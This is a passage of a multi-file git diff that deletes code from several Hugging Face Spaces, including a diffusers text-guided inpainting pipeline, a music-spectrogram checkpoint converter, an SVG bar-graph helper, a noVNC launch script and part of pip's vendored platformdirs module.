scheduler.config.skip_prk_steps is False: - deprecation_message = ( - f"The configuration file of this scheduler: {scheduler} has not set the configuration" - " `skip_prk_steps`. `skip_prk_steps` should be set to True in the configuration file. Please make" - " sure to update the config accordingly as not setting `skip_prk_steps` in the config might lead to" - " incorrect results in future versions. 
If you have downloaded this checkpoint from the Hugging Face" - " Hub, it would be very nice if you could open a Pull request for the" - " `scheduler/scheduler_config.json` file" - ) - deprecate("skip_prk_steps not set", "1.0.0", deprecation_message, standard_warn=False) - new_config = dict(scheduler.config) - new_config["skip_prk_steps"] = True - scheduler._internal_dict = FrozenDict(new_config) - - if safety_checker is None: - logger.warning( - f"You have disabled the safety checker for {self.__class__} by passing `safety_checker=None`. Ensure" - " that you abide to the conditions of the Stable Diffusion license and do not expose unfiltered" - " results in services or applications open to the public. Both the diffusers team and Hugging Face" - " strongly recommend to keep the safety filter enabled in all public facing circumstances, disabling" - " it only for use-cases that involve analyzing network behavior or auditing its results. For more" - " information, please have a look at https://github.com/huggingface/diffusers/pull/254 ." - ) - - self.register_modules( - segmentation_model=segmentation_model, - segmentation_processor=segmentation_processor, - vae=vae, - text_encoder=text_encoder, - tokenizer=tokenizer, - unet=unet, - scheduler=scheduler, - safety_checker=safety_checker, - feature_extractor=feature_extractor, - ) - - def enable_attention_slicing(self, slice_size: Optional[Union[str, int]] = "auto"): - r""" - Enable sliced attention computation. - - When this option is enabled, the attention module will split the input tensor in slices, to compute attention - in several steps. This is useful to save some memory in exchange for a small speed decrease. - - Args: - slice_size (`str` or `int`, *optional*, defaults to `"auto"`): - When `"auto"`, halves the input to the attention heads, so attention will be computed in two steps. If - a number is provided, uses as many slices as `attention_head_dim // slice_size`. 
In this case, - `attention_head_dim` must be a multiple of `slice_size`. - """ - if slice_size == "auto": - # half the attention head size is usually a good trade-off between - # speed and memory - slice_size = self.unet.config.attention_head_dim // 2 - self.unet.set_attention_slice(slice_size) - - def disable_attention_slicing(self): - r""" - Disable sliced attention computation. If `enable_attention_slicing` was previously invoked, this method will go - back to computing attention in one step. - """ - # set slice_size = `None` to disable `attention slicing` - self.enable_attention_slicing(None) - - def enable_sequential_cpu_offload(self): - r""" - Offloads all models to CPU using accelerate, significantly reducing memory usage. When called, unet, - text_encoder, vae and safety checker have their state dicts saved to CPU and then are moved to a - `torch.device('meta')` and loaded to GPU only when their specific submodule has its `forward` method called. - """ - if is_accelerate_available(): - from accelerate import cpu_offload - else: - raise ImportError("Please install accelerate via `pip install accelerate`") - - device = torch.device("cuda") - - for cpu_offloaded_model in [self.unet, self.text_encoder, self.vae, self.safety_checker]: - if cpu_offloaded_model is not None: - cpu_offload(cpu_offloaded_model, device) - - @property - # Copied from diffusers.pipelines.stable_diffusion.pipeline_stable_diffusion.StableDiffusionPipeline._execution_device - def _execution_device(self): - r""" - Returns the device on which the pipeline's models will be executed. After calling - `pipeline.enable_sequential_cpu_offload()` the execution device can only be inferred from Accelerate's module - hooks. 
- """ - if self.device != torch.device("meta") or not hasattr(self.unet, "_hf_hook"): - return self.device - for module in self.unet.modules(): - if ( - hasattr(module, "_hf_hook") - and hasattr(module._hf_hook, "execution_device") - and module._hf_hook.execution_device is not None - ): - return torch.device(module._hf_hook.execution_device) - return self.device - - @torch.no_grad() - def __call__( - self, - prompt: Union[str, List[str]], - image: Union[torch.FloatTensor, PIL.Image.Image], - text: str, - height: int = 512, - width: int = 512, - num_inference_steps: int = 50, - guidance_scale: float = 7.5, - negative_prompt: Optional[Union[str, List[str]]] = None, - num_images_per_prompt: Optional[int] = 1, - eta: float = 0.0, - generator: Optional[torch.Generator] = None, - latents: Optional[torch.FloatTensor] = None, - output_type: Optional[str] = "pil", - return_dict: bool = True, - callback: Optional[Callable[[int, int, torch.FloatTensor], None]] = None, - callback_steps: int = 1, - **kwargs, - ): - r""" - Function invoked when calling the pipeline for generation. - - Args: - prompt (`str` or `List[str]`): - The prompt or prompts to guide the image generation. - image (`PIL.Image.Image`): - `Image`, or tensor representing an image batch which will be inpainted, *i.e.* parts of the image will - be masked out with `mask_image` and repainted according to `prompt`. - text (`str``): - The text to use to generate the mask. - height (`int`, *optional*, defaults to 512): - The height in pixels of the generated image. - width (`int`, *optional*, defaults to 512): - The width in pixels of the generated image. - num_inference_steps (`int`, *optional*, defaults to 50): - The number of denoising steps. More denoising steps usually lead to a higher quality image at the - expense of slower inference. - guidance_scale (`float`, *optional*, defaults to 7.5): - Guidance scale as defined in [Classifier-Free Diffusion Guidance](https://arxiv.org/abs/2207.12598). 
- `guidance_scale` is defined as `w` of equation 2 of [Imagen - Paper](https://arxiv.org/pdf/2205.11487.pdf). Guidance scale is enabled by setting `guidance_scale > - 1`. Higher guidance scale encourages generating images that are closely linked to the text `prompt`, - usually at the expense of lower image quality. - negative_prompt (`str` or `List[str]`, *optional*): - The prompt or prompts not to guide the image generation. Ignored when not using guidance (i.e., ignored - if `guidance_scale` is less than `1`). - num_images_per_prompt (`int`, *optional*, defaults to 1): - The number of images to generate per prompt. - eta (`float`, *optional*, defaults to 0.0): - Corresponds to parameter eta (η) in the DDIM paper: https://arxiv.org/abs/2010.02502. Only applies to - [`schedulers.DDIMScheduler`], will be ignored for others. - generator (`torch.Generator`, *optional*): - A [torch generator](https://pytorch.org/docs/stable/generated/torch.Generator.html) to make generation - deterministic. - latents (`torch.FloatTensor`, *optional*): - Pre-generated noisy latents, sampled from a Gaussian distribution, to be used as inputs for image - generation. Can be used to tweak the same generation with different prompts. If not provided, a latents - tensor will be generated by sampling using the supplied random `generator`. - output_type (`str`, *optional*, defaults to `"pil"`): - The output format of the generated image. Choose between - [PIL](https://pillow.readthedocs.io/en/stable/): `PIL.Image.Image` or `np.array`. - return_dict (`bool`, *optional*, defaults to `True`): - Whether or not to return a [`~pipelines.stable_diffusion.StableDiffusionPipelineOutput`] instead of a - plain tuple. - callback (`Callable`, *optional*): - A function that will be called every `callback_steps` steps during inference. The function will be - called with the following arguments: `callback(step: int, timestep: int, latents: torch.FloatTensor)`. 
- callback_steps (`int`, *optional*, defaults to 1): - The frequency at which the `callback` function will be called. If not specified, the callback will be - called at every step. - - Returns: - [`~pipelines.stable_diffusion.StableDiffusionPipelineOutput`] or `tuple`: - [`~pipelines.stable_diffusion.StableDiffusionPipelineOutput`] if `return_dict` is True, otherwise a `tuple`. - When returning a tuple, the first element is a list with the generated images, and the second element is a - list of `bool`s denoting whether the corresponding generated image likely represents "not-safe-for-work" - (nsfw) content, according to the `safety_checker`. - """ - - # We use the input text to generate the mask - inputs = self.segmentation_processor( - text=[text], images=[image], padding="max_length", return_tensors="pt" - ).to(self.device) - outputs = self.segmentation_model(**inputs) - mask = torch.sigmoid(outputs.logits).cpu().detach().unsqueeze(-1).numpy() - mask_pil = self.numpy_to_pil(mask)[0].resize(image.size) - - # Run inpainting pipeline with the generated mask - inpainting_pipeline = StableDiffusionInpaintPipeline( - vae=self.vae, - text_encoder=self.text_encoder, - tokenizer=self.tokenizer, - unet=self.unet, - scheduler=self.scheduler, - safety_checker=self.safety_checker, - feature_extractor=self.feature_extractor, - ) - return inpainting_pipeline( - prompt=prompt, - image=image, - mask_image=mask_pil, - height=height, - width=width, - num_inference_steps=num_inference_steps, - guidance_scale=guidance_scale, - negative_prompt=negative_prompt, - num_images_per_prompt=num_images_per_prompt, - eta=eta, - generator=generator, - latents=latents, - output_type=output_type, - return_dict=return_dict, - callback=callback, - callback_steps=callback_steps, - ) diff --git a/spaces/pablodawson/ldm3d-inpainting/diffuserslocal/scripts/convert_music_spectrogram_to_diffusers.py b/spaces/pablodawson/ldm3d-inpainting/diffuserslocal/scripts/convert_music_spectrogram_to_diffusers.py 
deleted file mode 100644 index 41ee8b914774de09193f866c406057a92744bf51..0000000000000000000000000000000000000000 --- a/spaces/pablodawson/ldm3d-inpainting/diffuserslocal/scripts/convert_music_spectrogram_to_diffusers.py +++ /dev/null @@ -1,213 +0,0 @@ -#!/usr/bin/env python3 -import argparse -import os - -import jax as jnp -import numpy as onp -import torch -import torch.nn as nn -from music_spectrogram_diffusion import inference -from t5x import checkpoints - -from diffusers import DDPMScheduler, OnnxRuntimeModel, SpectrogramDiffusionPipeline -from diffusers.pipelines.spectrogram_diffusion import SpectrogramContEncoder, SpectrogramNotesEncoder, T5FilmDecoder - - -MODEL = "base_with_context" - - -def load_notes_encoder(weights, model): - model.token_embedder.weight = nn.Parameter(torch.FloatTensor(weights["token_embedder"]["embedding"])) - model.position_encoding.weight = nn.Parameter( - torch.FloatTensor(weights["Embed_0"]["embedding"]), requires_grad=False - ) - for lyr_num, lyr in enumerate(model.encoders): - ly_weight = weights[f"layers_{lyr_num}"] - lyr.layer[0].layer_norm.weight = nn.Parameter( - torch.FloatTensor(ly_weight["pre_attention_layer_norm"]["scale"]) - ) - - attention_weights = ly_weight["attention"] - lyr.layer[0].SelfAttention.q.weight = nn.Parameter(torch.FloatTensor(attention_weights["query"]["kernel"].T)) - lyr.layer[0].SelfAttention.k.weight = nn.Parameter(torch.FloatTensor(attention_weights["key"]["kernel"].T)) - lyr.layer[0].SelfAttention.v.weight = nn.Parameter(torch.FloatTensor(attention_weights["value"]["kernel"].T)) - lyr.layer[0].SelfAttention.o.weight = nn.Parameter(torch.FloatTensor(attention_weights["out"]["kernel"].T)) - - lyr.layer[1].layer_norm.weight = nn.Parameter(torch.FloatTensor(ly_weight["pre_mlp_layer_norm"]["scale"])) - - lyr.layer[1].DenseReluDense.wi_0.weight = nn.Parameter(torch.FloatTensor(ly_weight["mlp"]["wi_0"]["kernel"].T)) - lyr.layer[1].DenseReluDense.wi_1.weight = 
nn.Parameter(torch.FloatTensor(ly_weight["mlp"]["wi_1"]["kernel"].T)) - lyr.layer[1].DenseReluDense.wo.weight = nn.Parameter(torch.FloatTensor(ly_weight["mlp"]["wo"]["kernel"].T)) - - model.layer_norm.weight = nn.Parameter(torch.FloatTensor(weights["encoder_norm"]["scale"])) - return model - - -def load_continuous_encoder(weights, model): - model.input_proj.weight = nn.Parameter(torch.FloatTensor(weights["input_proj"]["kernel"].T)) - - model.position_encoding.weight = nn.Parameter( - torch.FloatTensor(weights["Embed_0"]["embedding"]), requires_grad=False - ) - - for lyr_num, lyr in enumerate(model.encoders): - ly_weight = weights[f"layers_{lyr_num}"] - attention_weights = ly_weight["attention"] - - lyr.layer[0].SelfAttention.q.weight = nn.Parameter(torch.FloatTensor(attention_weights["query"]["kernel"].T)) - lyr.layer[0].SelfAttention.k.weight = nn.Parameter(torch.FloatTensor(attention_weights["key"]["kernel"].T)) - lyr.layer[0].SelfAttention.v.weight = nn.Parameter(torch.FloatTensor(attention_weights["value"]["kernel"].T)) - lyr.layer[0].SelfAttention.o.weight = nn.Parameter(torch.FloatTensor(attention_weights["out"]["kernel"].T)) - lyr.layer[0].layer_norm.weight = nn.Parameter( - torch.FloatTensor(ly_weight["pre_attention_layer_norm"]["scale"]) - ) - - lyr.layer[1].DenseReluDense.wi_0.weight = nn.Parameter(torch.FloatTensor(ly_weight["mlp"]["wi_0"]["kernel"].T)) - lyr.layer[1].DenseReluDense.wi_1.weight = nn.Parameter(torch.FloatTensor(ly_weight["mlp"]["wi_1"]["kernel"].T)) - lyr.layer[1].DenseReluDense.wo.weight = nn.Parameter(torch.FloatTensor(ly_weight["mlp"]["wo"]["kernel"].T)) - lyr.layer[1].layer_norm.weight = nn.Parameter(torch.FloatTensor(ly_weight["pre_mlp_layer_norm"]["scale"])) - - model.layer_norm.weight = nn.Parameter(torch.FloatTensor(weights["encoder_norm"]["scale"])) - - return model - - -def load_decoder(weights, model): - model.conditioning_emb[0].weight = nn.Parameter(torch.FloatTensor(weights["time_emb_dense0"]["kernel"].T)) - 
model.conditioning_emb[2].weight = nn.Parameter(torch.FloatTensor(weights["time_emb_dense1"]["kernel"].T)) - - model.position_encoding.weight = nn.Parameter( - torch.FloatTensor(weights["Embed_0"]["embedding"]), requires_grad=False - ) - - model.continuous_inputs_projection.weight = nn.Parameter( - torch.FloatTensor(weights["continuous_inputs_projection"]["kernel"].T) - ) - - for lyr_num, lyr in enumerate(model.decoders): - ly_weight = weights[f"layers_{lyr_num}"] - lyr.layer[0].layer_norm.weight = nn.Parameter( - torch.FloatTensor(ly_weight["pre_self_attention_layer_norm"]["scale"]) - ) - - lyr.layer[0].FiLMLayer.scale_bias.weight = nn.Parameter( - torch.FloatTensor(ly_weight["FiLMLayer_0"]["DenseGeneral_0"]["kernel"].T) - ) - - attention_weights = ly_weight["self_attention"] - lyr.layer[0].attention.to_q.weight = nn.Parameter(torch.FloatTensor(attention_weights["query"]["kernel"].T)) - lyr.layer[0].attention.to_k.weight = nn.Parameter(torch.FloatTensor(attention_weights["key"]["kernel"].T)) - lyr.layer[0].attention.to_v.weight = nn.Parameter(torch.FloatTensor(attention_weights["value"]["kernel"].T)) - lyr.layer[0].attention.to_out[0].weight = nn.Parameter(torch.FloatTensor(attention_weights["out"]["kernel"].T)) - - attention_weights = ly_weight["MultiHeadDotProductAttention_0"] - lyr.layer[1].attention.to_q.weight = nn.Parameter(torch.FloatTensor(attention_weights["query"]["kernel"].T)) - lyr.layer[1].attention.to_k.weight = nn.Parameter(torch.FloatTensor(attention_weights["key"]["kernel"].T)) - lyr.layer[1].attention.to_v.weight = nn.Parameter(torch.FloatTensor(attention_weights["value"]["kernel"].T)) - lyr.layer[1].attention.to_out[0].weight = nn.Parameter(torch.FloatTensor(attention_weights["out"]["kernel"].T)) - lyr.layer[1].layer_norm.weight = nn.Parameter( - torch.FloatTensor(ly_weight["pre_cross_attention_layer_norm"]["scale"]) - ) - - lyr.layer[2].layer_norm.weight = nn.Parameter(torch.FloatTensor(ly_weight["pre_mlp_layer_norm"]["scale"])) - 
lyr.layer[2].film.scale_bias.weight = nn.Parameter( - torch.FloatTensor(ly_weight["FiLMLayer_1"]["DenseGeneral_0"]["kernel"].T) - ) - lyr.layer[2].DenseReluDense.wi_0.weight = nn.Parameter(torch.FloatTensor(ly_weight["mlp"]["wi_0"]["kernel"].T)) - lyr.layer[2].DenseReluDense.wi_1.weight = nn.Parameter(torch.FloatTensor(ly_weight["mlp"]["wi_1"]["kernel"].T)) - lyr.layer[2].DenseReluDense.wo.weight = nn.Parameter(torch.FloatTensor(ly_weight["mlp"]["wo"]["kernel"].T)) - - model.decoder_norm.weight = nn.Parameter(torch.FloatTensor(weights["decoder_norm"]["scale"])) - - model.spec_out.weight = nn.Parameter(torch.FloatTensor(weights["spec_out_dense"]["kernel"].T)) - - return model - - -def main(args): - t5_checkpoint = checkpoints.load_t5x_checkpoint(args.checkpoint_path) - t5_checkpoint = jnp.tree_util.tree_map(onp.array, t5_checkpoint) - - gin_overrides = [ - "from __gin__ import dynamic_registration", - "from music_spectrogram_diffusion.models.diffusion import diffusion_utils", - "diffusion_utils.ClassifierFreeGuidanceConfig.eval_condition_weight = 2.0", - "diffusion_utils.DiffusionConfig.classifier_free_guidance = @diffusion_utils.ClassifierFreeGuidanceConfig()", - ] - - gin_file = os.path.join(args.checkpoint_path, "..", "config.gin") - gin_config = inference.parse_training_gin_file(gin_file, gin_overrides) - synth_model = inference.InferenceModel(args.checkpoint_path, gin_config) - - scheduler = DDPMScheduler(beta_schedule="squaredcos_cap_v2", variance_type="fixed_large") - - notes_encoder = SpectrogramNotesEncoder( - max_length=synth_model.sequence_length["inputs"], - vocab_size=synth_model.model.module.config.vocab_size, - d_model=synth_model.model.module.config.emb_dim, - dropout_rate=synth_model.model.module.config.dropout_rate, - num_layers=synth_model.model.module.config.num_encoder_layers, - num_heads=synth_model.model.module.config.num_heads, - d_kv=synth_model.model.module.config.head_dim, - d_ff=synth_model.model.module.config.mlp_dim, - 
feed_forward_proj="gated-gelu", - ) - - continuous_encoder = SpectrogramContEncoder( - input_dims=synth_model.audio_codec.n_dims, - targets_context_length=synth_model.sequence_length["targets_context"], - d_model=synth_model.model.module.config.emb_dim, - dropout_rate=synth_model.model.module.config.dropout_rate, - num_layers=synth_model.model.module.config.num_encoder_layers, - num_heads=synth_model.model.module.config.num_heads, - d_kv=synth_model.model.module.config.head_dim, - d_ff=synth_model.model.module.config.mlp_dim, - feed_forward_proj="gated-gelu", - ) - - decoder = T5FilmDecoder( - input_dims=synth_model.audio_codec.n_dims, - targets_length=synth_model.sequence_length["targets_context"], - max_decoder_noise_time=synth_model.model.module.config.max_decoder_noise_time, - d_model=synth_model.model.module.config.emb_dim, - num_layers=synth_model.model.module.config.num_decoder_layers, - num_heads=synth_model.model.module.config.num_heads, - d_kv=synth_model.model.module.config.head_dim, - d_ff=synth_model.model.module.config.mlp_dim, - dropout_rate=synth_model.model.module.config.dropout_rate, - ) - - notes_encoder = load_notes_encoder(t5_checkpoint["target"]["token_encoder"], notes_encoder) - continuous_encoder = load_continuous_encoder(t5_checkpoint["target"]["continuous_encoder"], continuous_encoder) - decoder = load_decoder(t5_checkpoint["target"]["decoder"], decoder) - - melgan = OnnxRuntimeModel.from_pretrained("kashif/soundstream_mel_decoder") - - pipe = SpectrogramDiffusionPipeline( - notes_encoder=notes_encoder, - continuous_encoder=continuous_encoder, - decoder=decoder, - scheduler=scheduler, - melgan=melgan, - ) - if args.save: - pipe.save_pretrained(args.output_path) - - -if __name__ == "__main__": - parser = argparse.ArgumentParser() - - parser.add_argument("--output_path", default=None, type=str, required=True, help="Path to the converted model.") - parser.add_argument( - "--save", default=True, type=bool, required=False, help="Whether to save 
the converted model or not." - ) - parser.add_argument( - "--checkpoint_path", - default=f"{MODEL}/checkpoint_500000", - type=str, - required=False, - help="Path to the original jax model checkpoint.", - ) - args = parser.parse_args() - - main(args) diff --git a/spaces/paulengstler/interpretable-vertebral-fracture-diagnosis/netdissect/bargraph.py b/spaces/paulengstler/interpretable-vertebral-fracture-diagnosis/netdissect/bargraph.py deleted file mode 100644 index b139175894d739cb2a6edc2ba1403f89a1488005..0000000000000000000000000000000000000000 --- a/spaces/paulengstler/interpretable-vertebral-fracture-diagnosis/netdissect/bargraph.py +++ /dev/null @@ -1,109 +0,0 @@ -from xml.etree import ElementTree as et - -def make_svg_bargraph(labels, heights, categories=None, palette=None, - barheight=100, barwidth=12, show_labels=True, file_header=False, - data_url=False): - if palette is None: - palette = default_bargraph_palette - if categories is None: - categories = [('', len(labels))] - unitheight = float(barheight) / max(max(heights, default=1), 1) - textheight = barheight if show_labels else 0 - labelsize = float(barwidth) - gap = float(barwidth) / 4 - # textsize = barwidth + gap - textsize = barwidth + gap / 2 - rollup = max(heights, default=1) - textmargin = float(labelsize) * 2 / 3 - leftmargin = 32 - rightmargin = 8 - svgwidth = len(heights) * (barwidth + gap) + 2 * leftmargin + rightmargin - svgheight = barheight + textheight - - # create an SVG XML element - svg = et.Element('svg', width=str(svgwidth), height=str(svgheight), - version='1.1', xmlns='http://www.w3.org/2000/svg') - - # Draw the bar graph - basey = svgheight - textheight - x = leftmargin - # Add units scale on left - if len(heights): - for h in [1, (max(heights) + 1) // 2, max(heights)]: - et.SubElement(svg, 'text', x='0', y='0', - style=('font-family:sans-serif;font-size:%dpx;' + - 'text-anchor:end;alignment-baseline:hanging;' + - 'transform:translate(%dpx, %dpx);') % - (textsize, x - gap, basey - h 
* unitheight)).text = str(h) - et.SubElement(svg, 'text', x='0', y='0', - style=('font-family:sans-serif;font-size:%dpx;' + - 'text-anchor:middle;' + - 'transform:translate(%dpx, %dpx) rotate(-90deg)') % - (textsize, x - gap - textsize, basey - h * unitheight / 2) - ).text = 'units' - # Draw big category background rectangles - for catindex, (cat, catcount) in enumerate(categories): - if not catcount: - continue - et.SubElement(svg, 'rect', x=str(x), y=str(basey - rollup * unitheight), - width=(str((barwidth + gap) * catcount - gap)), - height = str(rollup*unitheight), - fill=palette[catindex % len(palette)][1]) - x += (barwidth + gap) * catcount - # Draw small bars as well as 45degree text labels - x = leftmargin - catindex = -1 - catcount = 0 - for label, height in zip(labels, heights): - while not catcount and catindex <= len(categories): - catindex += 1 - catcount = categories[catindex][1] - color = palette[catindex % len(palette)][0] - et.SubElement(svg, 'rect', x=str(x), y=str(basey-(height * unitheight)), - width=str(barwidth), height=str(height * unitheight), - fill=color) - x += barwidth - if show_labels: - et.SubElement(svg, 'text', x='0', y='0', - style=('font-family:sans-serif;font-size:%dpx;text-anchor:end;'+ - 'transform:translate(%dpx, %dpx) rotate(-45deg);') % - (labelsize, x, basey + textmargin)).text = label - x += gap - catcount -= 1 - # Text labels for each category - x = leftmargin - for cat, catcount in categories: - if not catcount: - continue - et.SubElement(svg, 'text', x='0', y='0', - style=('font-family:sans-serif;font-size:%dpx;text-anchor:end;'+ - 'transform:translate(%dpx, %dpx) rotate(-90deg);') % - (textsize, x + (barwidth + gap) * catcount - gap, - basey - rollup * unitheight + gap)).text = '%d %s' % ( - catcount, cat + ('s' if catcount != 1 else '')) - x += (barwidth + gap) * catcount - # Output - this is the bare svg. 
- result = et.tostring(svg).decode('utf-8') - if file_header or data_url: - result = ''.join([ - '\n', - '\n', - result]) - if data_url: - import base64 - result = 'data:image/svg+xml;base64,' + base64.b64encode( - result.encode('utf-8')).decode('utf-8') - return result - -default_bargraph_palette = [ - ('#4B4CBF', '#B6B6F2'), - ('#55B05B', '#B6F2BA'), - ('#50BDAC', '#A5E5DB'), - ('#81C679', '#C0FF9B'), - ('#F0883B', '#F2CFB6'), - ('#D4CF24', '#F2F1B6'), - ('#D92E2B', '#F2B6B6'), - ('#AB6BC6', '#CFAAFF'), -] - diff --git a/spaces/paulokewunmi/jumia_product_search/image_search_engine/data/utils.py b/spaces/paulokewunmi/jumia_product_search/image_search_engine/data/utils.py deleted file mode 100644 index e2483825ad37b6b413e1044261dbbc4e98477e56..0000000000000000000000000000000000000000 --- a/spaces/paulokewunmi/jumia_product_search/image_search_engine/data/utils.py +++ /dev/null @@ -1,16 +0,0 @@ -import json -from pathlib import Path - -package_dir = Path(__file__).resolve().parents[1] - - -def load_config( - file_path=package_dir / "artifacts/config.json", -): - with open(file_path) as file: - data = json.load(file) - return data - - -if __name__ == "__main__": - load_config() diff --git a/spaces/paulokewunmi/jumia_product_search/image_search_engine/tests/__init__.py b/spaces/paulokewunmi/jumia_product_search/image_search_engine/tests/__init__.py deleted file mode 100644 index e69de29bb2d1d6434b8b29ae775ad8c2e48c5391..0000000000000000000000000000000000000000 diff --git a/spaces/pengtony/hackathon_chatbot_openai_api/README.md b/spaces/pengtony/hackathon_chatbot_openai_api/README.md deleted file mode 100644 index 74244c635d9cfdfbcb01d269720a19e11de2c584..0000000000000000000000000000000000000000 --- a/spaces/pengtony/hackathon_chatbot_openai_api/README.md +++ /dev/null @@ -1,14 +0,0 @@ ---- -title: hackathon chatbot openai api -emoji: 🐨 -colorFrom: red -colorTo: gray -sdk: gradio -sdk_version: 3.20.1 -app_file: app.py -pinned: false -license: cc-by-4.0 
-duplicated_from: baixing/hackathon_chatbot_openai_api ---- - -Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference diff --git a/spaces/penguin2023/vncs/launch.sh b/spaces/penguin2023/vncs/launch.sh deleted file mode 100644 index 280a3aa1e478859123da0726386bf043db6f9335..0000000000000000000000000000000000000000 --- a/spaces/penguin2023/vncs/launch.sh +++ /dev/null @@ -1,167 +0,0 @@ -#!/usr/bin/env bash - -# Copyright (C) 2018 The noVNC Authors -# Licensed under MPL 2.0 or any later version (see LICENSE.txt) - -usage() { - if [ "$*" ]; then - echo "$*" - echo - fi - echo "Usage: ${NAME} [--listen PORT] [--vnc VNC_HOST:PORT] [--cert CERT] [--ssl-only]" - echo - echo "Starts the WebSockets proxy and a mini-webserver and " - echo "provides a cut-and-paste URL to go to." - echo - echo " --listen PORT Port for proxy/webserver to listen on" - echo " Default: 6080" - echo " --vnc VNC_HOST:PORT VNC server host:port proxy target" - echo " Default: localhost:5900" - echo " --cert CERT Path to combined cert/key file" - echo " Default: self.pem" - echo " --web WEB Path to web files (e.g. vnc.html)" - echo " Default: ./" - echo " --ssl-only Disable non-https connections." 
- echo " " - echo " --record FILE Record traffic to FILE.session.js" - echo " " - exit 2 -} - -NAME="$(basename $0)" -REAL_NAME="$(readlink -f $0)" -HERE="$(cd "$(dirname "$REAL_NAME")" && pwd)" -PORT="6080" -VNC_DEST="localhost:5900" -CERT="" -WEB="" -proxy_pid="" -SSLONLY="" -RECORD_ARG="" - -die() { - echo "$*" - exit 1 -} - -cleanup() { - trap - TERM QUIT INT EXIT - trap "true" CHLD # Ignore cleanup messages - echo - if [ -n "${proxy_pid}" ]; then - echo "Terminating WebSockets proxy (${proxy_pid})" - kill ${proxy_pid} - fi -} - -# Process Arguments - -# Arguments that only apply to chrooter itself -while [ "$*" ]; do - param=$1; shift; OPTARG=$1 - case $param in - --listen) PORT="${OPTARG}"; shift ;; - --vnc) VNC_DEST="${OPTARG}"; shift ;; - --cert) CERT="${OPTARG}"; shift ;; - --web) WEB="${OPTARG}"; shift ;; - --ssl-only) SSLONLY="--ssl-only" ;; - --record) RECORD_ARG="--record ${OPTARG}"; shift ;; - -h|--help) usage ;; - -*) usage "Unknown chrooter option: ${param}" ;; - *) break ;; - esac -done - -# Sanity checks -if bash -c "exec 7<>/dev/tcp/localhost/${PORT}" &> /dev/null; then - exec 7<&- - exec 7>&- - die "Port ${PORT} in use. Try --listen PORT" -else - exec 7<&- - exec 7>&- -fi - -trap "cleanup" TERM QUIT INT EXIT - -# Find vnc.html -if [ -n "${WEB}" ]; then - if [ ! -e "${WEB}/vnc.html" ]; then - die "Could not find ${WEB}/vnc.html" - fi -elif [ -e "$(pwd)/vnc.html" ]; then - WEB=$(pwd) -elif [ -e "${HERE}/../vnc.html" ]; then - WEB=${HERE}/../ -elif [ -e "${HERE}/vnc.html" ]; then - WEB=${HERE} -elif [ -e "${HERE}/../share/novnc/vnc.html" ]; then - WEB=${HERE}/../share/novnc/ -else - die "Could not find vnc.html" -fi - -# Find self.pem -if [ -n "${CERT}" ]; then - if [ ! 
-e "${CERT}" ]; then - die "Could not find ${CERT}" - fi -elif [ -e "$(pwd)/self.pem" ]; then - CERT="$(pwd)/self.pem" -elif [ -e "${HERE}/../self.pem" ]; then - CERT="${HERE}/../self.pem" -elif [ -e "${HERE}/self.pem" ]; then - CERT="${HERE}/self.pem" -else - echo "Warning: could not find self.pem" -fi - -# try to find websockify (prefer local, try global, then download local) -if [[ -e ${HERE}/websockify ]]; then - WEBSOCKIFY=${HERE}/websockify/run - - if [[ ! -x $WEBSOCKIFY ]]; then - echo "The path ${HERE}/websockify exists, but $WEBSOCKIFY either does not exist or is not executable." - echo "If you intended to use an installed websockify package, please remove ${HERE}/websockify." - exit 1 - fi - - echo "Using local websockify at $WEBSOCKIFY" -else - WEBSOCKIFY=$(which websockify 2>/dev/null) - - if [[ $? -ne 0 ]]; then - echo "No installed websockify, attempting to clone websockify..." - WEBSOCKIFY=${HERE}/websockify/run - git clone https://github.com/novnc/websockify ${HERE}/websockify - - if [[ ! -e $WEBSOCKIFY ]]; then - echo "Unable to locate ${HERE}/websockify/run after downloading" - exit 1 - fi - - echo "Using local websockify at $WEBSOCKIFY" - else - echo "Using installed websockify at $WEBSOCKIFY" - fi -fi - -echo "Starting webserver and WebSockets proxy on port ${PORT}" -#${HERE}/websockify --web ${WEB} ${CERT:+--cert ${CERT}} ${PORT} ${VNC_DEST} & -${WEBSOCKIFY} ${SSLONLY} --web ${WEB} ${CERT:+--cert ${CERT}} ${PORT} ${VNC_DEST} ${RECORD_ARG} & -proxy_pid="$!" -sleep 1 -if ! 
ps -p ${proxy_pid} >/dev/null; then - proxy_pid= - echo "Failed to start WebSockets proxy" - exit 1 -fi - -echo -e "\n\nNavigate to this URL:\n" -if [ "x$SSLONLY" == "x" ]; then - echo -e " http://$(hostname):${PORT}/vnc.html?host=$(hostname)&port=${PORT}\n" -else - echo -e " https://$(hostname):${PORT}/vnc.html?host=$(hostname)&port=${PORT}\n" -fi - -echo -e "Press Ctrl-C to exit\n\n" diff --git a/spaces/pknez/face-swap-docker/mynewshinyroop/Lib/site-packages/pip/_vendor/platformdirs/android.py b/spaces/pknez/face-swap-docker/mynewshinyroop/Lib/site-packages/pip/_vendor/platformdirs/android.py deleted file mode 100644 index 76527dda41f578f1caf3a0ef3256cd71b8e8d67a..0000000000000000000000000000000000000000 --- a/spaces/pknez/face-swap-docker/mynewshinyroop/Lib/site-packages/pip/_vendor/platformdirs/android.py +++ /dev/null @@ -1,210 +0,0 @@ -"""Android.""" -from __future__ import annotations - -import os -import re -import sys -from functools import lru_cache -from typing import cast - -from .api import PlatformDirsABC - - -class Android(PlatformDirsABC): - """ - Follows the guidance `from here `_. Makes use of the - `appname `, - `version `, - `ensure_exists `. - """ - - @property - def user_data_dir(self) -> str: - """:return: data directory tied to the user, e.g. ``/data/user///files/``""" - return self._append_app_name_and_version(cast(str, _android_folder()), "files") - - @property - def site_data_dir(self) -> str: - """:return: data directory shared by users, same as `user_data_dir`""" - return self.user_data_dir - - @property - def user_config_dir(self) -> str: - """ - :return: config directory tied to the user, e.g. 
\ - ``/data/user///shared_prefs/`` - """ - return self._append_app_name_and_version(cast(str, _android_folder()), "shared_prefs") - - @property - def site_config_dir(self) -> str: - """:return: config directory shared by the users, same as `user_config_dir`""" - return self.user_config_dir - - @property - def user_cache_dir(self) -> str: - """:return: cache directory tied to the user, e.g. ``/data/user///cache/``""" - return self._append_app_name_and_version(cast(str, _android_folder()), "cache") - - @property - def site_cache_dir(self) -> str: - """:return: cache directory shared by users, same as `user_cache_dir`""" - return self.user_cache_dir - - @property - def user_state_dir(self) -> str: - """:return: state directory tied to the user, same as `user_data_dir`""" - return self.user_data_dir - - @property - def user_log_dir(self) -> str: - """ - :return: log directory tied to the user, same as `user_cache_dir` if not opinionated else ``log`` in it, - e.g. ``/data/user///cache//log`` - """ - path = self.user_cache_dir 